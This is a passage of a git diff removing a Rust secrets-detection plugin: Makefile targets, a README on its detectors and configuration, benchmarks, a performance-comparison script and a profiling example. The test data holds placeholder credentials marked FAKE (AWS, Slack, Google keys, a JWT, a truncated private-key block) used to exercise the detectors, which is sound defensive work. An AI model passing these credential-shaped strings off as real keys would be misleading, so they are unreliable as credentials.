"$(GREEN)Build complete$(NC)" - -build-target: stub-gen ## Build for specific target (use TARGET=...) - @echo "$(GREEN)Building for target: $(TARGET)...$(NC)" - @uv run maturin build --release --target $(TARGET) - @echo "$(GREEN)Build complete for $(TARGET)$(NC)" - - -install: stub-gen - @echo "$(GREEN)Installing $(PACKAGE_NAME) plugin...$(NC)" - @cd ../.. && uv run maturin develop --release --manifest-path plugins_rust/secrets_detection/Cargo.toml - @echo "$(GREEN)Installation complete$(NC)" - -# Testing targets -test: ## Run Rust tests for plugin - @echo "$(GREEN)Running secrets_detection tests...$(NC)" - cargo test - -test-verbose: ## Run plugin tests (verbose) - @echo "$(GREEN)Running secrets_detection tests (verbose)...$(NC)" - cargo test --verbose - -test-python: ## Run Python unit tests for plugin (requires dev install) - @echo "$(GREEN)Running Python unit tests...$(NC)" - cd ../.. && uv run pytest tests -k secrets_detection -v - -fmt: ## Format code with rustfmt - @echo "$(GREEN)Formatting code...$(NC)" - cargo fmt - -fmt-check: ## Check if code is formatted - @echo "$(GREEN)Checking code format...$(NC)" - cargo fmt -- --check - -clippy: ## Run clippy linter - @echo "$(GREEN)Running clippy...$(NC)" - cargo clippy --all-targets --all-features -- -D warnings - -check-all: ## Run all checks (format, lint, test) - @echo "$(GREEN)Running all checks...$(NC)" - @$(MAKE) --no-print-directory fmt-check - @$(MAKE) --no-print-directory clippy - @$(MAKE) --no-print-directory test - -verify: ## Verify plugin installation - @echo "$(GREEN)Verifying secrets_detection installation...$(NC)" - @uv run python -c "import secrets_detection; print('✅ secrets_detection available')" || echo "⚠️ secrets_detection not installed" - -test-integration: ## Run integration tests - @echo "$(GREEN)Running integration tests...$(NC)" - @cargo test --test '*' --release - -# Benchmarking targets -bench: ## Run Rust benchmarks for plugin - @echo "$(GREEN)Running secrets_detection benchmarks...$(NC)" - cargo bench - -bench-compare: ## Alias for compare - @$(MAKE) --no-print-directory compare - -compare: install ## Run Python vs Rust performance comparison (full) - @echo "$(GREEN)Running performance comparison (Python vs Rust)...$(NC)" - @echo "$(YELLOW)Installing plugin first...$(NC)" - @$(MAKE) --no-print-directory install - @echo "" - @echo "$(YELLOW)Running comparison script...$(NC)" - cd ../../ && uv run python3 plugins_rust/secrets_detection/compare_performance.py - -compare-quick: install ## Run Python vs Rust performance comparison (quick) - @echo "$(GREEN)Running quick performance comparison...$(NC)" - @echo "$(YELLOW)Installing plugin first...$(NC)" - @$(MAKE) --no-print-directory install - @echo "" - @echo "$(YELLOW)Running comparison script (quick mode)...$(NC)" - uv run compare_performance.py --iterations 100 --warmup 10 - -compare-detailed: install ## Run Python vs Rust performance comparison (detailed) - @echo "$(GREEN)Running detailed performance comparison...$(NC)" - @echo "$(YELLOW)Installing plugin first...$(NC)" - @$(MAKE) --no-print-directory install - @echo "" - @echo "$(YELLOW)Running comparison script (detailed mode)...$(NC)" - uv run compare_performance.py --iterations 50000 --warmup 500 - -test-all: install ## Run all tests: cargo test, integration tests, and performance comparison - @echo "$(BLUE)Running complete test suite...$(NC)" - @echo "" - @echo "$(GREEN)Step 1/4: Installing plugin...$(NC)" - @$(MAKE) --no-print-directory install - @echo "" - @echo "$(GREEN)Step 2/4: Running Rust unit tests...$(NC)" - cargo test - @echo "" - @echo "$(GREEN)Step 3/4: Running Python tests...$(NC)" - cd ../.. && uv run python -m pytest tests -k secrets_detection -v - @echo "" - @echo "$(BLUE)✓ All tests completed successfully!$(NC)" - -# Security and audit targets -audit: ## Run security audit with cargo-audit - @echo "$(GREEN)Running security audit...$(NC)" - @command -v cargo-audit >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-audit...$(NC)"; cargo install cargo-audit; } - cargo audit - -audit-fix: ## Run security audit and apply fixes - @echo "$(GREEN)Running security audit with fixes...$(NC)" - cargo audit fix - -# Documentation targets -doc: ## Build Rust documentation - @echo "$(GREEN)Building documentation...$(NC)" - cargo doc --no-deps --document-private-items - -doc-open: doc ## Build and open documentation in browser - @echo "$(GREEN)Opening documentation...$(NC)" - cargo doc --no-deps --document-private-items --open - -# Coverage targets -coverage: ## Generate code coverage report - @echo "$(GREEN)Generating code coverage...$(NC)" - @command -v cargo-llvm-cov >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-llvm-cov...$(NC)"; cargo install cargo-llvm-cov; } - @mkdir -p coverage - cargo llvm-cov --cobertura --output-path coverage/cobertura.xml - @echo "$(GREEN)Coverage report generated at coverage/cobertura.xml$(NC)" - -# Cleaning targets -uninstall: ## Uninstall plugin from Python environment - @echo "$(YELLOW)Uninstalling secrets_detection...$(NC)" - @uv pip uninstall -y secrets_detection 2>/dev/null || pip uninstall -y secrets_detection 2>/dev/null || true - @echo "$(GREEN)secrets_detection uninstalled$(NC)" - -clean: ## Remove build artifacts - @echo "$(YELLOW)Cleaning build artifacts...$(NC)" - cargo clean - rm -rf target/ - rm -rf coverage/ - find . -type f -name "*.whl" -delete - find . -type f -name "*.pyc" -delete - find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true - -clean-all: clean ## Remove all generated files including caches - @echo "$(RED)Cleaning all generated files...$(NC)" - rm -rf ~/.cargo/registry/cache/ - rm -rf ~/.cargo/git/db/ - -info: ## Show build information - @echo "$(BLUE)Build Information:$(NC)" - @echo " Rust version: $$(rustc --version)" - @echo " Cargo version: $$(cargo --version)" - @echo " Maturin version: $$(uv run maturin --version 2>/dev/null || echo 'not installed')" - @echo " Python version: $$(uv run python --version)" - @echo "" - @echo "$(BLUE)Plugin Information:$(NC)" - @echo " Name: secrets_detection" - @echo " Version: $$(grep '^version' Cargo.toml | head -1 | cut -d'"' -f2)" - @echo " License: Apache-2.0" - -deps: ## Install/update dependencies - @echo "$(GREEN)Installing/updating dependencies...$(NC)" - @command -v uv >/dev/null 2>&1 && uv pip install maturin || { echo "$(YELLOW)Installing maturin...$(NC)"; uv pip install maturin; } - @command -v cargo-audit >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-audit...$(NC)"; cargo install cargo-audit; } - @command -v cargo-tarpaulin >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-tarpaulin...$(NC)"; cargo install cargo-tarpaulin; } - @echo "$(GREEN)Dependencies installed!$(NC)" - -# Watch targets (requires cargo-watch) -watch: ## Watch for changes and run tests - @command -v cargo-watch >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-watch...$(NC)"; cargo install cargo-watch; } - cargo watch -x test - -watch-dev: ## Watch for changes and rebuild in dev mode - @command -v cargo-watch >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-watch...$(NC)"; cargo install cargo-watch; } - cargo watch -s 'make install' - -# Performance profiling -flamegraph: ## Generate flamegraph from heavy workload example - @command -v cargo-flamegraph >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-flamegraph...$(NC)"; cargo install flamegraph; } - @echo "$(GREEN)Generating flamegraph from heavy workload...$(NC)" - cargo flamegraph --example heavy_workload - @echo "$(GREEN)Flamegraph saved to: flamegraph.svg$(NC)" - @echo "$(YELLOW)Open flamegraph.svg in a browser to view the interactive visualization$(NC)" - -# Statistics -stats: ## Show code statistics - @echo "$(BLUE)Code Statistics:$(NC)" - @echo " Rust files: $$(find src -name '*.rs' | wc -l)" - @echo " Rust lines: $$(find src -name '*.rs' -exec cat {} \; | wc -l)" - @echo " Bench files: $$(find benches -name '*.rs' 2>/dev/null | wc -l)" - @echo "" - @echo "$(BLUE)Dependency Tree:$(NC)" - @cargo tree --depth 1 - -# All PHONY targets -.PHONY: help build-target install \ - test test-verbose test-python test-integration test-all \ - fmt fmt-check clippy \ - bench compare compare-quick compare-detailed \ - audit audit-fix \ - doc doc-open \ - coverage \ - clean clean-all \ - info deps \ - watch watch-dev flamegraph stats diff --git a/plugins_rust/secrets_detection/README.md b/plugins_rust/secrets_detection/README.md deleted file mode 100644 index fe7c45a222..0000000000 --- a/plugins_rust/secrets_detection/README.md +++ /dev/null @@ -1,197 +0,0 @@ -# Secrets Detection Plugin (Rust) - -High-performance secret detection plugin implemented in Rust with optimized regex pattern matching. - -## Features - -- **Optimized Pattern Matching**: High-performance regex-based secret detection -- **Zero-Copy PyO3 Integration**: Direct Python object traversal without JSON serialization overhead -- **Pattern Detection**: AWS keys, API tokens, private keys, database credentials, and more -- **Optimized for Large Payloads**: Direct PyO3 traversal avoids Python→JSON→Python round-trip overhead - -## Prerequisites - -- **Python**: 3.11+ (ABI3 compatible) -- **Rust**: Latest stable toolchain (1.70+) -- **maturin**: Python package builder for Rust extensions -- **Virtual Environment**: Activated ContextForge venv - -Install prerequisites: -```bash -# Install Rust toolchain -curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh - -# Install maturin -pip install maturin -``` - -## Build - -```bash -cd plugins_rust/secrets_detection -maturin develop --release -``` - -The plugin automatically integrates with the Python fallback implementation in `plugins/secrets_detection/`, providing 2-8x performance improvements when available. - -## Configuration - -The plugin supports extensive configuration through ContextForge plugin system: - -```yaml -# plugins/config.yaml -secrets_detection: - enabled: true - config: - enabled: - aws_access_key_id: true - aws_secret_access_key: true - google_api_key: true - github_token: true - stripe_secret_key: true - generic_api_key_assignment: false # Broad heuristic; useful for X-API-Key/api_key=... style coverage, but can increase false positives # pragma: allowlist secret - slack_token: true - private_key_block: true - jwt_like: true - hex_secret_32: true - base64_24: false # Broad intrinsic-shape heuristic; keep opt-in unless you explicitly want aggressive blocking - redact: false # Replace secrets with redaction_text - redaction_text: "***REDACTED***" - block_on_detection: true # Block requests containing secrets - min_findings_to_block: 1 # Threshold for blocking -``` - -Warnings: -- `google_api_key`, `github_token`, and `stripe_secret_key` are specific detectors and are safe to leave enabled by default. -- `generic_api_key_assignment` is intentionally broad so it can catch header-style or assignment-style API keys across providers. It is disabled by default and should be enabled only when you want that extra coverage. -- `jwt_like`, `hex_secret_32`, and `base64_24` are also heuristic patterns. If you combine them with blocking mode, expect more false positives. - -What the plugin can do: -- Catch supported provider formats directly from their intrinsic token structure, without depending on surrounding labels. -- Catch labeled assignments such as `X-API-Key: ...` when you explicitly enable the broader generic assignment heuristic. -- Keep false positives relatively low by preferring provider-specific formats over generic entropy-based matching. - -What the plugin cannot do: -- It cannot guarantee 100% recall for every secret format in the ecosystem while also maintaining low false positives. -- It will not detect every arbitrary random-looking string with no provider prefix, no delimiter, and no stable structure. -- If you need coverage for a new vendor token format, the right approach is to add a dedicated high-confidence pattern instead of broadening the generic heuristic indefinitely. - -## Integration with ContextForge - -The Rust plugin seamlessly integrates as an acceleration layer for the existing Python plugin: - -1. **Automatic Fallback**: If Rust plugin fails to load, falls back to Python implementation -2. **Hook Integration**: Supports `prompt_pre_fetch`, `tool_post_invoke`, and `resource_post_fetch` hooks -3. **Zero Configuration**: Drop-in replacement requiring no code changes -4. **Performance Logging**: Reports 2-8x speedup when Rust implementation is active - -## Performance Comparison - -Compare Python vs Rust implementations: - -```bash -# From plugin directory -python compare_performance.py - -# With custom iterations -python compare_performance.py --iterations 100 --warmup 10 -``` - -The benchmark tests Rust vs Python implementations across multiple data sizes. - -## Benchmarks - -Run Criterion benchmarks: - -```bash -cargo bench -``` - -Results are saved to `target/criterion/` with HTML reports. - -## Performance Results - -### Apple M1 Max Benchmarks - -Tested on Apple M1 Max (10,000 iterations + 100 warmup): - -| Scenario | Python | Rust | Speedup | -|----------|--------|------|---------| -| **1KB (no secrets)** | 0.073 ms | 0.010 ms | **7.17x** 🚀 | -| **1KB (with secrets)** | 0.076 ms | 0.021 ms | **3.65x** 🚀 | -| **5KB (no secrets)** | 0.348 ms | 0.042 ms | **8.25x** 🚀 | -| **5KB (with secrets)** | 0.369 ms | 0.092 ms | **4.01x** 🚀 | - -**Key Findings:** -- **3.6-8.2x speedup** across all scenarios -- **Best performance gains** on clean data (no secrets): up to 8.25x faster -- **Significant improvements** even with secret detection: 3.6-4x faster -- **Consistent performance** across different data sizes and patterns - -### CPU Architecture Performance - -- **Apple Silicon (M1/M2)**: Consistent 1.3-1.6x speedup with optimized regex -- **x86_64**: Similar performance characteristics expected -- **ARM64**: Good performance across ARM-based systems -- **Cross-Platform**: Consistent behavior across all supported architectures - -## Development - -### Quick Commands - -```bash -make install # Build and install plugin -make test # Run Rust unit tests -make test-all # Complete test suite (install, unit tests, integration) -make compare # Python vs Rust performance comparison -make bench # Run Criterion benchmarks -``` - -### Running Tests - -```bash -# Rust unit tests -make test - -# Complete test suite (recommended) -make test-all # Installs plugin, runs cargo test and Python tests - -# Python unit tests -make test-python - -# Performance comparison -make compare # Full comparison -make compare-quick # Fewer iterations -make compare-detailed # More iterations -``` - -### Adding New Patterns - -1. Add pattern to `src/patterns.rs` -2. Update `PATTERNS` constant -3. Add corresponding test -4. Update both Python and Rust implementations - -### Performance Profiling - -```bash -# Criterion benchmarks -make bench - -# Flamegraph profiling (heavy workload) -make flamegraph -``` - -The `flamegraph` target generates an interactive CPU profiling visualization: - -1. Processes 1 million messages with realistic secret patterns -2. Creates `flamegraph.svg` showing CPU time distribution -3. Open the SVG in a browser to explore the interactive visualization - -**Flamegraph shows:** -- Time spent in regex pattern matching -- String allocation and manipulation overhead -- Function call hierarchy and hot paths -- Performance bottlenecks in the detection pipeline - -This is more useful than benchmark flamegraphs as it avoids Criterion's parallel execution overhead and focuses on the actual secret detection workload. diff --git a/plugins_rust/secrets_detection/benches/secrets_detection.rs b/plugins_rust/secrets_detection/benches/secrets_detection.rs deleted file mode 100644 index 57f9e40da8..0000000000 --- a/plugins_rust/secrets_detection/benches/secrets_detection.rs +++ /dev/null @@ -1,165 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Criterion benchmarks for secrets detection performance - -use criterion::{BenchmarkId, Criterion, Throughput, criterion_group, criterion_main}; -use secrets_detection_rust::{SecretsDetectionConfig, detect_and_redact}; -use std::collections::HashMap; -use std::hint::black_box; -use std::time::Duration; - -fn create_test_config() -> SecretsDetectionConfig { - SecretsDetectionConfig { - enabled: HashMap::from([ - ("aws_access_key_id".to_string(), true), - ("aws_secret_access_key".to_string(), true), - ("google_api_key".to_string(), true), - ("slack_token".to_string(), true), - ("private_key_block".to_string(), true), - ("jwt_like".to_string(), true), - ("hex_secret_32".to_string(), true), - ("base64_24".to_string(), true), - ]), - redact: true, - redaction_text: "***REDACTED***".to_string(), - block_on_detection: true, - min_findings_to_block: 1, - } -} - -fn create_no_redact_config() -> SecretsDetectionConfig { - SecretsDetectionConfig { - redact: false, - ..create_test_config() - } -} - -// Create realistic conversation data with various secret types -fn create_realistic_conversation_data() -> Vec<(&'static str, &'static str)> { - vec![ - // Clean conversation messages - ( - "clean", - "I'm setting up a microservices architecture on Kubernetes. What are the best practices for service discovery?", - ), - ( - "clean", - "For monitoring our services, I recommend using Prometheus with Grafana dashboards and Jaeger for distributed tracing.", - ), - // Messages with secrets - ( - "aws_secret", - "Here are my AWS credentials: AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE AWS_SECRET_ACCESS_KEY=FAKESecretAccessKeyForTestingEXAMPLE0000", - ), - ( - "slack_token", - "Our Slack bot token is xoxr-fake-000000000-fake000000000-fakefakefakefake for notifications", - ), - ( - "google_api", - "The Google API key is AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345 for our maps integration", - ), - ( - "jwt_token", - "JWT token: eyJfake_header_12345.eyJfake_payload_1234.fake_signature_12345678", - ), - ( - "hex_secret", - "Database encryption key: 00face00dead00beef00cafe00fade0000000000000000000000000000000000", - ), - ( - "base64_secret", - "Service account key: dGhpcyBpcyBhIGJhc2U2NCBlbmNvZGVkIHNlY3JldCBrZXkgZm9yIHRlc3RpbmcgcHVycG9zZXM=", - ), - ( - "mixed_secrets", - "Deploy with AWS_KEY=AKIAFAKE67890EXAMPLE SLACK_TOKEN=xoxr-fake-123-456-789 API_KEY=AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345", - ), - ] -} - -// Benchmark detect_and_redact function with realistic conversation data -fn bench_detect_and_redact(c: &mut Criterion) { - let messages = create_realistic_conversation_data(); - let config = create_test_config(); - let no_redact_config = create_no_redact_config(); - - let mut group = c.benchmark_group("detect_and_redact"); - group.measurement_time(Duration::from_millis(500)); - group.warm_up_time(Duration::from_millis(100)); - group.sample_size(50); - - for (message_type, message) in messages.iter() { - group.throughput(Throughput::Bytes(message.len() as u64)); - - // With redaction - group.bench_with_input( - BenchmarkId::new("with_redaction", message_type), - message, - |b, msg| { - b.iter(|| detect_and_redact(black_box(msg), black_box(&config))); - }, - ); - - // Detection only (no redaction) - group.bench_with_input( - BenchmarkId::new("detection_only", message_type), - message, - |b, msg| { - b.iter(|| detect_and_redact(black_box(msg), black_box(&no_redact_config))); - }, - ); - } - - group.finish(); -} - -// Benchmark batch processing -fn bench_batch_processing(c: &mut Criterion) { - let messages = create_realistic_conversation_data(); - let config = create_test_config(); - - let mut group = c.benchmark_group("batch_processing"); - group.measurement_time(Duration::from_millis(500)); - group.warm_up_time(Duration::from_millis(100)); - group.sample_size(50); - - // Extract just the messages for batch processing - let message_texts: Vec<&str> = messages.iter().map(|(_, msg)| *msg).collect(); - let total_bytes: u64 = message_texts.iter().map(|m| m.len() as u64).sum(); - - group.throughput(Throughput::Bytes(total_bytes)); - - group.bench_function("all_messages_batch", |b| { - b.iter(|| { - for message in &message_texts { - let _ = detect_and_redact(black_box(message), black_box(&config)); - } - }); - }); - - // Test individual messages with secrets - let secret_messages: Vec<&str> = messages - .iter() - .filter(|(msg_type, _)| *msg_type != "clean") - .map(|(_, msg)| *msg) - .collect(); - - for (i, message) in secret_messages.iter().enumerate() { - group.throughput(Throughput::Bytes(message.len() as u64)); - group.bench_with_input( - BenchmarkId::new("individual_with_secrets", i), - message, - |b, msg| { - b.iter(|| detect_and_redact(black_box(msg), black_box(&config))); - }, - ); - } - - group.finish(); -} - -criterion_group!(benches, bench_detect_and_redact, bench_batch_processing); - -criterion_main!(benches); diff --git a/plugins_rust/secrets_detection/compare_performance.py b/plugins_rust/secrets_detection/compare_performance.py deleted file mode 100644 index eaa1f2e2fc..0000000000 --- a/plugins_rust/secrets_detection/compare_performance.py +++ /dev/null @@ -1,191 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -"""Performance comparison using native Python objects (no JSON serialization). - -This benchmark provides a fair apples-to-apples comparison by using native -Python objects for both implementations, eliminating JSON serialization overhead. - -Measurements: -- Python (native): Baseline Python implementation -- Rust (native): High-performance Rust implementation via PyO3 - -Usage: - python compare_performance.py - python compare_performance.py --iterations 100 --warmup 10 -""" - -import argparse -import logging -import statistics -import sys -import time -from pathlib import Path -from typing import Any, Dict, List, Tuple - -# Add plugins directory to path to import Python implementation -sys.path.insert(0, str(Path(__file__).parent.parent.parent / "plugins" / "secrets_detection")) - - -def configure_benchmark_logging() -> None: - """Keep benchmark output focused on timings by surfacing only errors.""" - logging.getLogger().setLevel(logging.ERROR) - for logger_name in [ - "plugins.secrets_detection.secrets_detection", - "secrets_detection", - "secrets_detection_rust", - "secrets_detection_rust.secrets_detection_rust", - ]: - logging.getLogger(logger_name).setLevel(logging.ERROR) - - -from secrets_detection import SecretsDetectionConfig, _scan_container # noqa: E402 - -# Try to import Rust implementation -try: - from secrets_detection_rust.secrets_detection_rust import py_scan_container as rust_scan_container - - RUST_AVAILABLE = True -except ImportError: - RUST_AVAILABLE = False - rust_scan_container = None - print("⚠️ Rust implementation not available. Build it with:") - print(" cd plugins_rust/secrets_detection && maturin develop --release") - print() - - -def generate_test_data(size_kb: int, with_secrets: bool) -> Dict[str, Any]: - """Generate test data with optional secrets - realistic conversation format.""" - # Realistic conversation messages (matching Rust benchmark) - clean_messages = [ - "I'm setting up a microservices architecture on Kubernetes. What are the best practices for service discovery?", - "For monitoring our services, I recommend using Prometheus with Grafana dashboards and Jaeger for distributed tracing.", - "Let's discuss the deployment pipeline. We should implement blue-green deployments with automated rollback capabilities.", - "The API gateway should handle rate limiting, authentication, and request routing to backend services.", - ] - - secret_messages = [ - "Here are my AWS credentials: AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE AWS_SECRET_ACCESS_KEY=FAKESecretAccessKeyForTestingEXAMPLE0000", - "Our Slack bot token is xoxr-fake-000000000-fake000000000-fakefakefakefake for notifications", - "The Google API key is AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345 for our maps integration", - "JWT token: eyJfake_header_12345.eyJfake_payload_1234.fake_signature_12345678", - "Database encryption key: 00face00dead00beef00cafe00fade0000000000000000000000000000000000", - "Service account key: dGhpcyBpcyBhIGJhc2U2NCBlbmNvZGVkIHNlY3JldCBrZXkgZm9yIHRlc3RpbmcgcHVycG9zZXM=", - ] - - # Build conversation array to reach target size - messages = [] - current_size = 0 - target_size = size_kb * 1024 - - base_messages = secret_messages if with_secrets else clean_messages - - while current_size < target_size: - for msg in base_messages: - conversation_entry = {"role": "user" if len(messages) % 2 == 0 else "assistant", "content": msg, "timestamp": "2024-01-01T00:00:00Z"} - messages.append(conversation_entry) - current_size += len(str(conversation_entry)) - if current_size >= target_size: - break - - return {"messages": messages, "metadata": {"size": size_kb, "count": len(messages)}} - - -def benchmark_python(data: Any, config: SecretsDetectionConfig, iterations: int, warmup: int = 5) -> Tuple[List[float], int]: - """Benchmark Python implementation (pure Python, no Rust).""" - for _ in range(warmup): - _scan_container(data, config, use_rust=False) - - times = [] - count = 0 - for _ in range(iterations): - start = time.perf_counter() - c, _, _ = _scan_container(data, config, use_rust=False) - times.append(time.perf_counter() - start) - count = c - - return times, count - - -def benchmark_rust(data: Any, config: SecretsDetectionConfig, iterations: int, warmup: int = 5) -> Tuple[List[float], int]: - """Benchmark Rust implementation with native Python objects.""" - if not RUST_AVAILABLE: - return [], 0 - - for _ in range(warmup): - rust_scan_container(data, config) - - times = [] - count = 0 - for _ in range(iterations): - start = time.perf_counter() - c, _, _ = rust_scan_container(data, config) - times.append(time.perf_counter() - start) - count = c - - return times, count - - -def run_scenario(name: str, data: Any, config: SecretsDetectionConfig, iterations: int, warmup: int = 5): - """Run benchmark scenario.""" - print(f"\n{'=' * 70}") - print(f"Scenario: {name}") - print(f"{'=' * 70}") - - # Python - print("Running Python...", end=" ", flush=True) - py_times, py_count = benchmark_python(data, config, iterations, warmup) - py_mean = statistics.mean(py_times) * 1000 - py_median = statistics.median(py_times) * 1000 - py_stdev = statistics.stdev(py_times) * 1000 if len(py_times) > 1 else 0 - print(f"✓ ({py_mean:.3f} ms/iter, {py_count} secrets)") - - if RUST_AVAILABLE: - # Rust - print("Running Rust...", end=" ", flush=True) - rust_times, rust_count = benchmark_rust(data, config, iterations, warmup) - rust_mean = statistics.mean(rust_times) * 1000 - rust_median = statistics.median(rust_times) * 1000 - rust_stdev = statistics.stdev(rust_times) * 1000 if len(rust_times) > 1 else 0 - speedup = py_mean / rust_mean if rust_mean > 0 else 0 - print(f"✓ ({rust_mean:.3f} ms/iter, {rust_count} secrets)") - - print("\n📊 Results:") - print(f" Python: {py_mean:.3f} ms ±{py_stdev:.3f} (median: {py_median:.3f})") - print(f" Rust: {rust_mean:.3f} ms ±{rust_stdev:.3f} (median: {rust_median:.3f}) - {speedup:.2f}x faster 🚀") - - if py_count != rust_count: - print(f"\n ⚠️ WARNING: Different counts! Python={py_count}, Rust={rust_count}") - else: - print("\n📊 Results:") - print(f" Python: {py_mean:.3f} ms ±{py_stdev:.3f} (median: {py_median:.3f})") - print(" Rust: Not available") - - -def main(): - """Run performance comparison benchmarks for secrets detection.""" - parser = argparse.ArgumentParser(description="Native Python object performance comparison") - parser.add_argument("--iterations", type=int, default=10000, help="Iterations per scenario") - parser.add_argument("--warmup", type=int, default=100, help="Warmup iterations") - args = parser.parse_args() - configure_benchmark_logging() - - print("🔍 Secrets Detection Performance (Native Python Objects)") - print(f"Iterations: {args.iterations} (+ {args.warmup} warmup)") - print(f"Rust available: {'✓' if RUST_AVAILABLE else '✗'}") - - config = SecretsDetectionConfig() - - # Test scenarios - for size_kb in [1, 5]: - for with_secrets in [False, True]: - name = f"{size_kb}KB ({'with' if with_secrets else 'no'} secrets)" - data = generate_test_data(size_kb, with_secrets) - run_scenario(name, data, config, args.iterations, args.warmup) - - print(f"\n{'=' * 70}") - print("✅ Benchmark complete!") - print(f"{'=' * 70}\n") - - -if __name__ == "__main__": - main() diff --git a/plugins_rust/secrets_detection/deny.toml b/plugins_rust/secrets_detection/deny.toml deleted file mode 100644 index 142f5157ff..0000000000 --- a/plugins_rust/secrets_detection/deny.toml +++ /dev/null @@ -1,27 +0,0 @@ -# Cargo-deny config: license and policy checks for this crate. -# See https://embarkstudios.github.io/cargo-deny/ - -[licenses] -unused-allowed-license = "allow" -confidence-threshold = 0.95 -allow = [ - # Currently used across our Rust projects - "Apache-2.0", - "BSD-2-Clause", - "BSD-3-Clause", - "BSL-1.0", - "CC0-1.0", - "ISC", - "LGPL-2.1-or-later", - "MIT", - "MIT-0", - "OpenSSL", - "Unicode-3.0", - "Unicode-DFS-2016", - "Unlicense", - "Zlib", - # Common safe licenses in the Rust ecosystem - "0BSD", - "Apache-2.0 WITH LLVM-exception", - "Unicode-DFS-2015", -] diff --git a/plugins_rust/secrets_detection/examples/heavy_workload.rs b/plugins_rust/secrets_detection/examples/heavy_workload.rs deleted file mode 100644 index a172bae7b9..0000000000 --- a/plugins_rust/secrets_detection/examples/heavy_workload.rs +++ /dev/null @@ -1,81 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Heavy workload example for flamegraph profiling - -use secrets_detection_rust::{SecretsDetectionConfig, detect_and_redact}; -use std::collections::HashMap; - -fn create_test_config() -> SecretsDetectionConfig { - SecretsDetectionConfig { - enabled: HashMap::from([ - ("aws_access_key_id".to_string(), true), - ("aws_secret_access_key".to_string(), true), - ("google_api_key".to_string(), true), - ("slack_token".to_string(), true), - ("private_key_block".to_string(), true), - ("jwt_like".to_string(), true), - ("hex_secret_32".to_string(), true), - ("base64_24".to_string(), true), - ]), - redact: true, - redaction_text: "***REDACTED***".to_string(), - block_on_detection: true, - min_findings_to_block: 1, - } -} - -fn main() { - let config = create_test_config(); - - // Create a large dataset with various secret types - let test_messages = vec![ - "Clean message about Kubernetes deployment strategies and best practices for microservices.", - "AWS credentials: AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE AWS_SECRET_ACCESS_KEY=FAKESecretAccessKeyForTestingEXAMPLE0000", - "Slack bot token: xoxr-fake-000000000-fake000000000-fakefakefakefake for notifications", - "Google API key: AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345 for maps integration", - "JWT token: eyJfake_header_12345.eyJfake_payload_1234.fake_signature_12345678", - "Database encryption key: 00face00dead00beef00cafe00fade0000000000000000000000000000000000", - "Service account key: dGhpcyBpcyBhIGJhc2U2NCBlbmNvZGVkIHNlY3JldCBrZXkgZm9yIHRlc3RpbmcgcHVycG9zZXM=", - "Multiple secrets: AWS_KEY=AKIAFAKE67890EXAMPLE SLACK_TOKEN=xoxr-fake-123-456-789 API_KEY=AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345", - "Discussion about Docker container orchestration and service mesh architectures.", - "Private key block: -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA... -----END RSA PRIVATE KEY-----", - ]; - - println!("Starting heavy workload processing..."); - println!("Processing {} message types", test_messages.len()); - - // Process each message type 100,000 times to create heavy workload - let iterations = 100_000; - let mut total_processed = 0; - let mut secrets_found = 0; - - for iteration in 0..iterations { - for message in &test_messages { - let (findings, _redacted) = detect_and_redact(message, &config); - total_processed += 1; - - if !findings.is_empty() { - secrets_found += 1; - } - } - - // Progress indicator every 10,000 iterations - if (iteration + 1) % 10_000 == 0 { - println!( - "Processed {} iterations ({} total messages, {} with secrets)", - iteration + 1, - total_processed, - secrets_found - ); - } - } - - println!("\nWorkload complete!"); - println!("Total messages processed: {}", total_processed); - println!("Messages with secrets found: {}", secrets_found); - println!( - "Detection rate: {:.2}%", - (secrets_found as f64 / total_processed as f64) * 100.0 - ); -} diff --git a/plugins_rust/secrets_detection/pyproject.toml b/plugins_rust/secrets_detection/pyproject.toml deleted file mode 100644 index ae09fc4890..0000000000 --- a/plugins_rust/secrets_detection/pyproject.toml +++ /dev/null @@ -1,22 +0,0 @@ -[build-system] -requires = ["maturin>=1.4,<2.0"] -build-backend = "maturin" - -[project] -name = "mcpgateway-secret-detection" -version = "1.0.0-RC-1" -description = "High-performance secret detection library for MCP Gateway" -authors = [{ name = "MCP Gateway Contributors" }] -license = { text = "Apache-2.0" } -requires-python = ">=3.11" -classifiers = [ - "Programming Language :: Rust", - "Programming Language :: Python :: Implementation :: CPython", - "Programming Language :: Python :: 3.11", - "Programming Language :: Python :: 3.12", -] - -[tool.maturin] -module-name = "secrets_detection_rust" -python-source = "python" -features = ["pyo3/extension-module"] diff --git a/plugins_rust/secrets_detection/python/secrets_detection_rust/__init__.pyi b/plugins_rust/secrets_detection/python/secrets_detection_rust/__init__.pyi deleted file mode 100644 index 693236e1fc..0000000000 --- a/plugins_rust/secrets_detection/python/secrets_detection_rust/__init__.pyi +++ /dev/null @@ -1,14 +0,0 @@ -# This file is automatically generated by pyo3_stub_gen -# ruff: noqa: E501, F401, F403, F405 - -import builtins -import typing - -__all__ = [ - "py_scan_container", -] - -def py_scan_container(container: typing.Any, config: typing.Any) -> tuple[builtins.int, typing.Any, list]: - r""" - Scan Python container for secrets using optimized type dispatch - """ diff --git a/plugins_rust/secrets_detection/src/bin/stub_gen.rs b/plugins_rust/secrets_detection/src/bin/stub_gen.rs deleted file mode 100644 index 13ab239da3..0000000000 --- a/plugins_rust/secrets_detection/src/bin/stub_gen.rs +++ /dev/null @@ -1,19 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 